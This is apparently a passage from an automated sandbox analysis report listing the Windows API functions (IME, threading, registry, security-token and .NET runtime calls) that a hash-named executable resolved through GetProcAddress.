\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005912)\n 